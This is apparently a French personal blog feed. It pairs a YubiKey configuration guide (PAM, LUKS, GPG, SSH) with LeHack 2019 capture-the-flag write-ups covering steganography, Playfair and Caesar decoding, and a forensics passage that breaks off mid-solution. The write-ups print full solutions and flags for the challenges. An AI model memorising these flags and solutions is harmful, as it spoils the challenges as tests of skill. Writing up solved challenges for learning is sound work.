<p>Et on ajoute un de plus au hash et la nomenclature :</p>
<p><code>2 + 1 = 3 => ECW{3d9382f08cd82a430a59343b21934753}</code></p>
<p>Hop ! 50 points de plus :).</p>Yubikey2019-08-09T18:19:00+02:002019-08-09T18:19:00+02:00nlegalltag:blog.nlegall.fr,2019-08-09:/yubikey.html<h1>Présentation</h1>
<p><img alt="yubikey" src="https://www.yubico.com/wp-content/uploads/2019/07/yubikey5_family_new.png"></p>
<p>Yubikey est l'un des dispositif d'authentification U2F (Universal Second Factor) les plus connus. Ce protocole est porté par l'alliance FIDO. Il se veut ouvert à tous. De nombreuses autres clés prenant en charger cette norme existe : Key-ID FIDO U2F, Keydo FIDO U2F...</p>
<p>Yubikey a l'avantage d'avoir de nombreuses documentation …</p><h1>Présentation</h1>
<p><img alt="yubikey" src="https://www.yubico.com/wp-content/uploads/2019/07/yubikey5_family_new.png"></p>
<p>Yubikey est l'un des dispositif d'authentification U2F (Universal Second Factor) les plus connus. Ce protocole est porté par l'alliance FIDO. Il se veut ouvert à tous. De nombreuses autres clés prenant en charger cette norme existe : Key-ID FIDO U2F, Keydo FIDO U2F...</p>
<p>Yubikey a l'avantage d'avoir de nombreuses documentation disponibles pour couvrir l'ensemble des usages possibles : PAM, KeePass, GPG...</p>
<p>Je vous propose un récapitulatif des différentes documentations que j'ai pu utilisé pour configurer la clé et les applications ou services.</p>
<p>Si vous souhaitez apporter un complément ou un nouvel usage, n'hésitez pas à me contacter.</p>
<h1>Configuration</h1>
<h2>PAM</h2>
<div class="highlight"><pre><span></span><code><span class="c1"># https://developers.yubico.com/pam-u2f/</span>
pacaur -S pam-2uf
pamu2fcfg > /etc/u2f_mappings
cat /etc/u2f_mappings
</code></pre></div>
<p>Il faut ensuite éditer le fichier <code>/etc/pam.d/system-auth</code> afin de rajouter l'u2f comme nouvelle méthode d'authentification PAM. Voilà la configuration par défaut sur Manjaro :</p>
<div class="highlight"><pre><span></span><code><span class="err">auth required pam_unix.so try_first_pass nullok</span>
<span class="err">auth optional pam_permit.so</span>
<span class="err">auth required pam_env.so</span>
</code></pre></div>
<p>En fonction de votre besoin, la seconde valeur peut prendre les valeur suivante :</p>
<ul>
<li>sufficient : l'authentification est alors autorisé et l'ensemble des autres règles n'est pas interprété.</li>
<li>required : l'authentification est obligatoire et l'ensemble des autres règles est également interprété. Même si l'un des modules échoué, tant que l'ensemble n'est pas fini, l'authentification se poursuit.</li>
<li>requisite : idem que pour required mais l'utilisateur est avertit immédiatement de l'échec.</li>
<li>optional : l'échec ou le succès de ce module n'influe pas sur l'authentification.</li>
</ul>
<p>Suivant votre choix pour <code>sufficient</code>, l'emplacement de la nouvelle ligne importe :</p>
<ul>
<li>si elle est placée au dessus de <code>pam_unix.so</code> (la première ligne par défaut), la clé seule suffit mais le mot de passe est toujours possible si vous n'avez pas la clé.</li>
<li>si elle est placée au dessous, le mot de passe devra être saisi et la clé présente.</li>
</ul>
<h2>LUKS</h2>
<p>LUKS (Linux Unified Key Setup) est une implémentation de chiffrement considérant comme le standard associé à Linux. Son implémentation de référence est <code>cryptsetup</code> avec <code>dm-crypt</code> pour le chiffrement de volumes (<a href="https://gitlab.com/cryptsetup/cryptsetup">projet git</a>). Lorsque vous choisissez de chiffrer votre disque lors de l'installation, LUKS est quasiment systématiquement utilisé.</p>
<p>Pour avoir l'état de votre partition :</p>
<div class="highlight"><pre><span></span><code>sudo cryptsetup luksDump /dev/nvme0n1p2
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c1"># https://github.com/agherzan/yubikey-full-disk-encryption</span>
pacaur -S yubikey-full-disk-encryption-git
vim /etc/ykfde.conf
sudo ykfde-enroll -d /dev/nvme0n1p2 -s <span class="m">3</span>
sudo cryptsetup luksOpen --test-passphrase /dev/nvme0n1p2 --key-slot<span class="o">=</span><span class="m">3</span> -v
</code></pre></div>
<p>Si la dernière commande vous renvoie <code>Key slot 3 unlocked</code>, votre slot est alors configuré correctement et vous devriez être en mesure de déchiffrer votre LUSK avec la passphrase et la clé.</p>
<h2>GPG</h2>
<p>L'avantage est d'avoir sa clé GPG toujours avec soi :). La clé ne sera plus protégée par mot de passe mais par le code pin qui sera défini sur la clé. Par défaut, le code admin est <code>12345678</code> et le code simple et <code>123456</code>. Il est donc important de changer ces deux pin.</p>
<p>Les clés seront alors effacées depuis le trousseau GPG. Il faudra importer de nouveau la clé publique (et seulement publique) dans le trousseau pour que les clés privées ainsi transférées soient reconnues.</p>
<div class="highlight"><pre><span></span><code>gpg --card-edit
admin
passwd
<span class="c1"># PIN</span>
<span class="m">1</span>
<span class="c1"># Admin bin</span>
<span class="m">3</span>
<span class="c1"># Reset code</span>
<span class="m">4</span>
verify
quit
</code></pre></div>
<h3>Génération des clés GPG</h3>
<div class="highlight"><pre><span></span><code><span class="c1"># 8 (RSA)</span>
<span class="c1"># E</span>
<span class="c1"># 4096bits</span>
<span class="c1"># None</span>
<span class="c1"># Your email</span>
<span class="c1"># Your passphare</span>
gpg --expert --full-gen-key
gpg --expert --edit-key <longid>
gpg> addkey
<span class="c1"># select S and E</span>
gpg> addkey
</code></pre></div>
<h3>Envoie sur la clé</h3>
<div class="highlight"><pre><span></span><code><span class="err">gpg --card-edit --expert</span>
<span class="err">gpg> toggle</span>
<span class="err">gpg> keytocard</span>
<span class="err">gpg> key 1</span>
<span class="err">gpg> keytocard</span>
<span class="err">gpg> save</span>
</code></pre></div>
<h2>SSH</h2>
<p>Il est possible de configurer sa clé comme pour PAM sur le même principe. Il sera alors possible de se connecter en utilisant la clé comme on le ferait avec le système de clé publique/privée.</p>
<p>Il faut installer un paquet afin de prendre en charge cette nouvelle méthode d'authentification :</p>
<div class="highlight"><pre><span></span><code>apt install libpam-yubico
touch /etc/ssh/authorized_yubikeys
<span class="c1"># Get `YUBIKEY_ID` with `read -p "Enter a YubiKey OTP: " s && echo 'The key id is' ${s:0:12}`</span>
cat <span class="s1">'USER:YUBIKEY_ID'</span> >> /etc/ssh/authorized_yubikeys
</code></pre></div>
<p>Cependant, il est nécessaire d'utiliser l'<a href="https://upgrade.yubico.com/getapikey/">API</a> de Yubico pour qu'elle fonctionne. Il n'est pas nécessaire de faire un compte. Une adresse mail et un token généré par la clé est demandé. Vous aurez alors un <code>ID</code> et la <code>KEY</code> correspondante.</p>
<p><code>/etc/pam.d/sshd</code></p>
<div class="highlight"><pre><span></span><code>auth sufficient pam_yubico.so id=ID key=KEY authfile=/etc/ssh/authorized_yubikeys
</code></pre></div>
<h3>Avec GPG</h3>
<p>GPG comme SSH utilise le chiffrement RSA. Il est alors possible d'utiliser sa clé privée GPG comme clé SSH.</p>
<div class="highlight"><pre><span></span><code><span class="nb">echo</span> <span class="nv">$SSH_AUTH_SOCK</span>
> /run/user/1000/gnupg/S.gpg-agent.ssh
ssh-add -l
ssh-add -L <span class="p">|</span> grep <span class="s2">"cardno:000605553211"</span> > ~/.ssh/id_rsa_yubikey.pub
cat ~/.ssh/id_rsa_yubikey.pub
</code></pre></div>
<p>Vous n'avez plus qu'à copier cette clé publique sur les serveurs que vous souhaitez utiliser avec votre Yubikey.</p>
<p>Si la clé n'est pas présente, elle vous sera alors demandée explicitement ainsi que le PIN.</p>
<h2>Windows</h2>
<p>La Yubikey 5 n'est actuellement pas pris en charge pleiment pas Windows. La configuration se faisait au travers de l'application Hello disponible sur le Store par Microsoft. La documentation est disponible <a href="https://support.yubico.com/support/solutions/articles/15000006472">ici</a></p>
<div class="highlight"><pre><span></span><code>NOTE: Many customers have reached out to us asking why the YubiKey for Windows Hello app is not compatible with the YubiKey 5 Series and when the application will be updated to support the YubiKey 5 Series. The short answer is - it won't be. The YubiKey for Windows Hello app will no longer be receiving updates and will soon be removed from the Microsoft Store.
</code></pre></div>LeHack 19 - alphajet2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-alphajet.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/alphajet.pgm">alphajet.pgm</a></em></p>
<div class="highlight"><pre><span></span><code>alphajet
50 Points
an easy stega
Url: https://static.wargame.rocks/alphajet.pgm
</code></pre></div>
<p>En stéganographie, les techniques de LSB (Less Significant Bits) et MSB (Most Significant Bits) sont les plus utilisés. On peut donc supposer que le flag de cette épreuve a été caché à l'aide d'une …</p><p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/alphajet.pgm">alphajet.pgm</a></em></p>
<div class="highlight"><pre><span></span><code>alphajet
50 Points
an easy stega
Url: https://static.wargame.rocks/alphajet.pgm
</code></pre></div>
<p>En stéganographie, les techniques de LSB (Less Significant Bits) et MSB (Most Significant Bits) sont les plus utilisés. On peut donc supposer que le flag de cette épreuve a été caché à l'aide d'une de ces méthodes.</p>
<p>Cependant, le format <code>pgm</code> n'est pas reconnu par la plus part des outils d'anlyse. Il faut donc d'abord le transformer en <code>png</code> afin de rendre les outils opérationels. Cette opération peut être facilement faite en python avec la librairie pillow.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="kn">from</span> <span class="nn">PIL</span> <span class="kn">import</span> <span class="n">Image</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"alphajet.pgm"</span><span class="p">,</span> <span class="n">mode</span><span class="o">=</span><span class="s2">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">fp</span><span class="p">:</span>
<span class="c1">#P2</span>
<span class="n">_</span> <span class="o">=</span> <span class="n">fp</span><span class="o">.</span><span class="n">readline</span><span class="p">()</span>
<span class="c1">#Dimensions du fichier : 567 * 291 </span>
<span class="n">width</span><span class="p">,</span> <span class="n">height</span> <span class="o">=</span> <span class="nb">tuple</span><span class="p">([</span><span class="nb">int</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">fp</span><span class="o">.</span><span class="n">readline</span><span class="p">()</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">" "</span><span class="p">)])</span>
<span class="c1">#rebuilding de l'image</span>
<span class="n">img</span> <span class="o">=</span> <span class="n">Image</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="s2">"L"</span><span class="p">,</span> <span class="p">(</span><span class="n">width</span><span class="p">,</span> <span class="n">height</span><span class="p">),</span> <span class="p">(</span><span class="mi">0</span><span class="p">,))</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">height</span><span class="p">):</span>
<span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">width</span><span class="p">):</span>
<span class="n">img</span><span class="o">.</span><span class="n">putpixel</span><span class="p">((</span><span class="n">j</span><span class="p">,</span><span class="n">i</span><span class="p">),</span> <span class="nb">int</span><span class="p">(</span><span class="n">fp</span><span class="o">.</span><span class="n">readline</span><span class="p">()))</span>
<span class="n">img</span><span class="o">.</span><span class="n">save</span><span class="p">(</span><span class="s2">"alphaget.png"</span><span class="p">)</span>
</code></pre></div>
<p>Un fois notre <code>png</code> créé, on peut utiliser l'outil <code>zsteg</code> par exemple :</p>
<div class="highlight"><pre><span></span><code><span class="c1"># gem install zsteg</span>
$ zsteg alphaget.png
b1,r,lsb,xy .. text: <span class="s2">"Le flag est: lh_{EtMy4WiQofuCeMEf8672}.Le flag est: lh_{EtMy4WiQofuCeMEf8672}.Le flag est: lh_{EtMy4WiQofuCeMEf8672}.Le flag est: lh_{EtMy4WiQofuCeMEf8672}.Le flag est: lh_{EtMy4WiQofuCeMEf8672}.Le flag est: lh_{EtMy4WiQofuCeMEf8672}.Le flag est: lh_{EtMy4"</span>
</code></pre></div>
<p>On obtiens alors le flag de manière répétée : <code>lh_{EtMy4WiQofuCeMEf8672}</code>.</p>LeHack 19 - Au service de la France #12019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-au-service-de-la-france-1.html<p><em>File : none</em></p>
<div class="highlight"><pre><span></span><code>Au service de la france #1
30 Points
Au service de la france - partie 1
contexte
Vous êtes Jean-Michel, barbouze aguerrie de notre cher Pays. Vu que vous n'êtes pas très doué en langues étrangères, vous vous êtes spécialisé en informatique. Vous êtes devenu le Kev (Mitnick …</code></pre></div><p><em>File : none</em></p>
<div class="highlight"><pre><span></span><code>Au service de la france #1
30 Points
Au service de la france - partie 1
contexte
Vous êtes Jean-Michel, barbouze aguerrie de notre cher Pays. Vu que vous n'êtes pas très doué en langues étrangères, vous vous êtes spécialisé en informatique. Vous êtes devenu le Kev (Mitnick, pas Adams) de l'agence, et aujourd'hui le travail hardu, c'est pour vous...
a propos
Ce challenge est le premier d'une série de quatre challenges, qui vous permettra de récupérer suffisamment d'information pour contrer une attaque russe contre la France! Chaque challenge peut se faire de manière indépendante. Cependant, pour inciter les gens à réaliser les challenges dans l'ordre, chaque résolution du challenge numéro N vous donnera un indice pour résoudre le challenge N+1.
disclaimer
Ce challenge est une pure fiction. Toute ressemblance avec des gens et/ou entités a pour but d'apporter un peu plus de réalisme avec une dose d'humour(troll) au challenges principalement basé sur les ragots. Aucune atteinte à ces personnes/entités n'a donc été voulue, et l'auteur s'excuse par avance.
challenge
Le téléphone sonne de manière répétée depuis 10 minutes... Pourtant, il est 5h du matin, vous êtes encore complètement grisé du pot de départ de la veille... Après s'être levé et décrocher le combiné, moment qui vous a paru être une éternité, vous entendez une voix robotique : "- Bon..jour mon..sieur Hulot. Le pi..geon a de..co..llé." Pas le temps de dire "allo?" que ça a raccroché... Cependant, vous savez de qui il s'agit, c'est votre employeur! et ce genre de message ça signifie pas bon... Vous enfilez votre peignoir, et ouvrez votre boîte mail anonymisée gmail. Dedans, vous trouvez le message suivant:
''' To: jeanmichel78@gmail.com From: juliettedu38@gmail.com Objet: Hey cousin, vas mater ma nouvelle vidéo!
Salut cousin,
j'ai sorti une nouvelle vidéo. Faudrait vraiment que tu la regarde!
je te fais plein de bisous Juliette
Comme tu m'a appris la dernière fois qu'on s'est vu, ma signature pour dire que c'est bien moi! :
PT09PT09PSBCRUdJTiBFTkNSWVBURUQgUExBWUZBSVIgTUVTU0FHRSBJRDo4MzM1ODQ0ODQwODcxMDkyODcxMSAgICAgPT09PT09PQ0KDQpSWVBYVkZOUFZYRUFWQ1pJVkJESFRaVkJET0FWREhDRlJYWEZQQ1RNVFZSTUdCRVZaUlRLQ0FXSE5QQ1RaSENGVENUTVRWTFRUVkVBWUJWSVNGR0NDQU9FVkVLVlJaTlBTWVpTQ0VOVFFUQ1RUQ1JaUEdDWUtQUlpOVEZaUEdCS1lCSUJQTkhaTlpFR1BDRUFVWlFJRUFUTFlCREhUQ0NCS0hWVFlCVkVUTFpHVFZUVlRDWllXSEdQVFJUQ0NBQ0lWRUtWRVBFS1pUWUdHWFRTWEZQQ0VBS09DWUhWTFNFR0tWVE1ESFpPVkVESFFWT1RFVldIS1BWQ0NUUkVWVEdFWk5QTlBDRUFMU1FZQkdUVkZaQ1BWQ1NFTlBHREVYVE5FUFpHTlROUkVBSUJRSUhCRE9BVkRIQ1NESEFWT1RQTlFUSUhaU1hGUENJUFNRUEVSU0VBSUJUVkJGSVBUVlNWUEVFUEtFSFhTUVNST0RCS1BJR0RBTVNOVExaR1RWS1ZWWFBRRVBaRlZRREhBTVJOVkNPVElCS05IU05MRVZWQ0lCSVBCS1FJSFpUVkJGSVBUVkFRVkVUTFpHVFZHWktQWFRCVFBLSUJFQVhHS1RFQVVaUENDRlRTVFBaRkFRQ1RHRVBFS0VGWVFNS1JLSQ0KDQo9PT09PT09PT09PT09PT09PT09PT09RU5EIE1FU1NBR0U9PT09PT09PT09PT09PT09PT09PT09PQ==
encore des bisous! '''
</code></pre></div>
<p>Bon, comme souvent avec la l'encodage en base64, les deux signes <code>=</code> en fin de chaîne nous l'indique. On commence donc par décoder cette chaîne :</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"PT09PT09PSBCRUdJTiBFTkNSWVBURUQgUExBWUZBSVIgTUVTU0FHRSBJRDo4MzM1ODQ0ODQwODcxMDkyODcxMSAgICAgPT09PT09PQ0KDQpSWVBYVkZOUFZYRUFWQ1pJVkJESFRaVkJET0FWREhDRlJYWEZQQ1RNVFZSTUdCRVZaUlRLQ0FXSE5QQ1RaSENGVENUTVRWTFRUVkVBWUJWSVNGR0NDQU9FVkVLVlJaTlBTWVpTQ0VOVFFUQ1RUQ1JaUEdDWUtQUlpOVEZaUEdCS1lCSUJQTkhaTlpFR1BDRUFVWlFJRUFUTFlCREhUQ0NCS0hWVFlCVkVUTFpHVFZUVlRDWllXSEdQVFJUQ0NBQ0lWRUtWRVBFS1pUWUdHWFRTWEZQQ0VBS09DWUhWTFNFR0tWVE1ESFpPVkVESFFWT1RFVldIS1BWQ0NUUkVWVEdFWk5QTlBDRUFMU1FZQkdUVkZaQ1BWQ1NFTlBHREVYVE5FUFpHTlROUkVBSUJRSUhCRE9BVkRIQ1NESEFWT1RQTlFUSUhaU1hGUENJUFNRUEVSU0VBSUJUVkJGSVBUVlNWUEVFUEtFSFhTUVNST0RCS1BJR0RBTVNOVExaR1RWS1ZWWFBRRVBaRlZRREhBTVJOVkNPVElCS05IU05MRVZWQ0lCSVBCS1FJSFpUVkJGSVBUVkFRVkVUTFpHVFZHWktQWFRCVFBLSUJFQVhHS1RFQVVaUENDRlRTVFBaRkFRQ1RHRVBFS0VGWVFNS1JLSQ0KDQo9PT09PT09PT09PT09PT09PT09PT09RU5EIE1FU1NBR0U9PT09PT09PT09PT09PT09PT09PT09PQ=="</span> <span class="p">|</span> base64 -d
<span class="o">=======</span> BEGIN ENCRYPTED PLAYFAIR MESSAGE ID:83358448408710928711 <span class="o">=======</span>
<span class="nv">RYPXVFNPVXEAVCZIVBDHTZVBDOAVDHCFRXXFPCTMTVRMGBEVZRTKCAWHNPCTZHCFTCTMTVLTTVEAYBVISFGCCAOEVEKVRZNPSYZSCENTQTCTTCRZPGCYKPRZNTFZPGBKYBIBPNHZNZEGPCEAUZQIEATLYBDHTCCBKHVTYBVETLZGTVTVTCZYWHGPTRTCCACIVEKVEPEKZTYGGXTSXFPCEAKOCYHVLSEGKVTMDHZOVEDHQVOTEVWHKPVCCTREVTGEZNPNPCEALSQYBGTVFZCPVCSENPGDEXTNEPZGNTNREAIBQIHBDOAVDHCSDHAVOTPNQTIHZSXFPCIPSQPERSEAIBTVBFIPTVSVPEEPKEHXSQSRODBKPIGDAMSNTLZGTVKVVXPQEPZFVQDHAMRNVCOTIBKNHSNLEVVCIBIPBKQIHZTVBFIPTVAQVETLZGTVGZKPXTBTPKIBEAXGKTEAUZPCCFTSTPZFAQCTGEPEKEFYQMKRKI</span>
<span class="o">======================</span>END <span class="nv">MESSAGE</span><span class="o">=======================</span>
</code></pre></div>
<p>Cela nous donne un nouveau message encodé. Mais nous avons le nom de l'encodage utilisé : <a href="https://en.wikipedia.org/wiki/Playfair_cipher"><code>PLAYFAIR</code></a>. On peut facilement trouver des décoder en ligne. On peut utiliser celui-ci qui propose de faire du brute force sur la chaine : https://bionsgadgets.appspot.com/ww_forms/playfair_ph_web_worker3.html.</p>
<div class="highlight"><pre><span></span><code>ahmichelcontentdevousrevoirnousxsomxmespresquecertainsquelesrusxsespreparentuneofxfensivecontrelafranceapressetreinfiltreauseindundeleurbatimentdupontapunousenvoyerunecapturereseauquiestsensexecontenirsuffisamxmentdinformationspourdecouvrircequilenestveritablementmalheureusementceluiciaetetueavantdepouvoirnousfournirleprogramxmepermettantderecuperercetteinformationdepuislacaptureoncomptesurvouslavenirdelafranceendependpourrecupererlecaptureutilisezlidentifiantdumesxsagesurlesitetinyuploadx
score of plaintext is 1264.05 on trial: 26375, fudge factor: 0.15, % accept: 6.97, Doppleschach score: 0.62
Key: UYFGHZASTRBNCEVWLMPQDKXIO
(trial: 2000000 % accepted: 0.12 decrementing, new cycle len: 19) worker: 2
</code></pre></div>
<p>On patiente le temps qu'il décode et hop, on a notre message. On mettant les espaces, la ponctuation et en corrigeant les quelques fautes, il en devient plus lisible :</p>
<div class="highlight"><pre><span></span><code>ah michel, content de vous revoir. nous sommes presque certains que les russes préparent une offensive contre la France après setrinfiltre au sein d’un de leur bâtiment. Dupont a pu nous envoyer une capture réseau qui est sensée contenir suffisamment d'informations pour découvrir ce qui l'en est véritablement. Malheureusement, celui-ci a été tué avant de pouvoir nous fournir le programme permettant de récupérer cette information depuis la capture. On compte sur vous. L'avenir de la France en dépend. Pour récupérer la capture; utilisez l'identifiant du message sur le site tinyupload.
</code></pre></div>
<p>On peut essayer d'envoyer un fichier pour savoir comment est construit l'URL sur http://s000.tinyupload.com/. Cela nous donne le lien suivant : http://s000.tinyupload.com/index.php?file_id=83358448408710928711. On récupère le fichier et on l'ouvre :</p>
<div class="highlight"><pre><span></span><code>Bien joué, tu as résolu le premier challenge! Après avoir rentré le flag, n'hésite pas à continuer, mais je te préviens, ce sera plus dur! Pour la suite de l'histoire, va voir la page du challenge "au service de la france - partie 2".
Indice pour la suite: Le flag est présent au sein d'un protocole que l'on a pas l'habitude de voir.
voici le flag: LH{awmerbx2cft4u5uqgnde}
</code></pre></div>
<p>On donc des informations pour le chapitre suivant et le flag : <code>LH{awmerbx2cft4u5uqgnde}</code>/</p>LeHack 19 - double cesar2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-double-cesar.html<div class="highlight"><pre><span></span><code>double cesar
5 Points
Un ami m'a posé un challenge sur IRC. Il a d'après lui créé un algorithme de chiffrement super dur à casser, basé sur deux chiffres de césar d'affilée. Il m'a en effet expliqué que ça a pu être cassé uniquement parce que …</code></pre></div><div class="highlight"><pre><span></span><code>double cesar
5 Points
Un ami m'a posé un challenge sur IRC. Il a d'après lui créé un algorithme de chiffrement super dur à casser, basé sur deux chiffres de césar d'affilée. Il m'a en effet expliqué que ça a pu être cassé uniquement parce que Jules César n'avait pas pensé à en mettre plusieurs à la suite. Bref, il m'a envoyé ça : "oqemdradftqiuzfdabradf" et m'a dit "vas y tu trouveras pas ce que j'ai mis". Et j'avoue que faire toutes les combinaisons de deux chiffres de césar me paraît trop compliqué. Peux-tu m'aider à cracker son code?
</code></pre></div>
<p>La chaîne à décoder est donc <code>oqemdradftqiuzfdabradf</code>. Le principe du chiffrement de César est initialement un décalage de 3 lettre :</p>
<ul>
<li>A -> D</li>
<li>B -> E</li>
<li>C -> F</li>
<li>...</li>
</ul>
<p>Un double chiffrement de César est alors de retrouver le nombre total de décalages réalisés. On peut utiliser ce <a href="https://www.dcode.fr/caesar-cipher">site</a>. Il permet de décoder via brute force en affichant les décalages de 1 à 25, soit toutes les combinaisons possibles.</p>
<p>Il est également possible de faire via un script Python :</p>
<div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="n">argv</span>
<span class="n">message</span> <span class="o">=</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">LETTERS</span> <span class="o">=</span> <span class="s1">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span>
<span class="n">letters</span> <span class="o">=</span> <span class="s1">'abcdefghijklmnopqrstuvwxyz'</span>
<span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">26</span><span class="p">):</span>
<span class="n">translated</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">for</span> <span class="n">letter</span> <span class="ow">in</span> <span class="n">message</span><span class="p">:</span>
<span class="k">if</span> <span class="n">letter</span><span class="o">.</span><span class="n">isupper</span><span class="p">():</span>
<span class="n">current_alphabet</span> <span class="o">=</span> <span class="n">LETTERS</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">current_alphabet</span> <span class="o">=</span> <span class="n">letters</span>
<span class="n">num</span> <span class="o">=</span> <span class="n">current_alphabet</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="n">letter</span><span class="p">)</span>
<span class="n">num</span> <span class="o">=</span> <span class="n">num</span> <span class="o">-</span> <span class="n">key</span>
<span class="k">if</span> <span class="n">num</span> <span class="o"><</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">num</span> <span class="o">=</span> <span class="n">num</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">current_alphabet</span><span class="p">)</span>
<span class="n">translated</span> <span class="o">+=</span> <span class="n">current_alphabet</span><span class="p">[</span><span class="n">num</span><span class="p">]</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Key </span><span class="si">%s</span><span class="s1">: </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">translated</span><span class="p">))</span>
</code></pre></div>
<p>On peut ensuite appeler notre script avec comme argument le message à décoder :</p>
<div class="highlight"><pre><span></span><code>$ python rot.py oqemdradftqiuzfdabradf
Key <span class="m">0</span>: oqemdradftqiuzfdabradf
Key <span class="m">1</span>: npdlcqzcesphtyeczaqzce
<span class="o">[</span>...<span class="o">]</span>
Key <span class="m">12</span>: cesarforthewintropfort
Key <span class="m">13</span>: bdrzqenqsgdvhmsqnoenqs
</code></pre></div>
<p>On cherche alors un message cohérent dans l'ensemble des valeurs. On trouve alors la rotation de 12 lettres, ce qui donne comme message décodé : <code>cesarforthewintropfort</code>.</p>LeHack 19 - #ECSC Amok2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-ecsc-amok.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/103_spx.zip">103_spx.zip</a></em></p>
<div class="highlight"><pre><span></span><code>ECSC# 103_spx
80 Points
tu fais du forensic? bah t'as pas besoin de description, nah!
Url: https://static.wargame.rocks/103_spx.zip
</code></pre></div>
<p>Bon, on a pas beaucoup de texte pour nous aider. On récupère donc l'archive et on extrait son contenu.</p>
<div class="highlight"><pre><span></span><code>$ unzip 103_spx.zip
Archive: 103_spx …</code></pre></div><p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/103_spx.zip">103_spx.zip</a></em></p>
<div class="highlight"><pre><span></span><code>ECSC# 103_spx
80 Points
tu fais du forensic? bah t'as pas besoin de description, nah!
Url: https://static.wargame.rocks/103_spx.zip
</code></pre></div>
<p>Bon, on a pas beaucoup de texte pour nous aider. On récupère donc l'archive et on extrait son contenu.</p>
<div class="highlight"><pre><span></span><code>$ unzip 103_spx.zip
Archive: 103_spx.zip
inflating: USB_a_analyser
</code></pre></div>
<p>On récupère ainsi un fichier. La commande <code>file</code> nous permet de connaitre le type de fichier et comment on va pouvoir le manipuler :</p>
<div class="highlight"><pre><span></span><code>$ file USB_a_analyser
USB_a_analyser: DOS/MBR boot sector, code offset 0x52+2, OEM-ID <span class="s2">"NTFS "</span>, sectors/cluster <span class="m">8</span>, Media descriptor 0xf8, sectors/track <span class="m">62</span>, heads <span class="m">8</span>, dos < <span class="m">4</span>.0 BootSector <span class="o">(</span>0x80<span class="o">)</span>, FAT <span class="o">(</span>1Y bit by descriptor<span class="o">)</span><span class="p">;</span> NTFS, sectors/track <span class="m">62</span>, sectors <span class="m">507903</span>, <span class="nv">$MFT</span> start cluster <span class="m">4</span>, <span class="nv">$MFTMirror</span> start cluster <span class="m">31743</span>, bytes/RecordSegment <span class="m">2</span>^<span class="o">(</span>-1*246<span class="o">)</span>, clusters/index block <span class="m">1</span>, serial number 06d84ef355f47cf91
</code></pre></div>
<p>On peut donc monter ce fichier comme lecteur (lecture seule optionnelle mais évite d'altérer les données) et regarder le contenu :</p>
<div class="highlight"><pre><span></span><code><span class="c1"># montage en lecture seule afin de ne pas altérer les données</span>
$ mount USB_a_analyser forensic -o ro
$ <span class="nb">cd</span> forensic
$ ls -alh
total 101K
drwxrwxrwx <span class="m">1</span> root root <span class="m">4</span>.0K Jul <span class="m">6</span> <span class="m">14</span>:14 .
drwxrwxrwt <span class="m">22</span> root root <span class="m">4</span>.0K Jul <span class="m">14</span> <span class="m">21</span>:19 ..
-rwxrwxrwx <span class="m">1</span> root root <span class="m">577</span> Jul <span class="m">6</span> <span class="m">14</span>:10 message.txt
-rwxrwxrwx <span class="m">1</span> root root 15K Jul <span class="m">6</span> <span class="m">01</span>:46 Peugeot103SPXFILI.jpg
drwxrwxrwx <span class="m">1</span> root root <span class="m">8</span>.0K Jul <span class="m">6</span> <span class="m">14</span>:12 <span class="s1">'Peugeot 103 SPX : tous les modèles de 1987 à 2003 | Actualités de la mobylette par Mobylette Mag_files'</span>
-rwxrwxrwx <span class="m">1</span> root root 68K Jul <span class="m">6</span> <span class="m">14</span>:12 <span class="s1">'Peugeot 103 SPX : tous les modèles de 1987 à 2003 | Actualités de la mobylette par Mobylette Mag.html'</span>
drwxrwxrwx <span class="m">1</span> root root <span class="m">0</span> Jul <span class="m">6</span> <span class="m">14</span>:14 .Trash-1000
</code></pre></div>
<p>On remarque un fichier <code>message.txt</code> :</p>
<div class="highlight"><pre><span></span><code>$ cat message.txt
Si un jour je relis ce message, le mot de passe utilisé pour chiffrer mon plus grand secret était <span class="s2">"vgrohhfyek0wkfi5fv13anexapy3sso6"</span> et j<span class="s1">'avais utilisé openssl.</span>
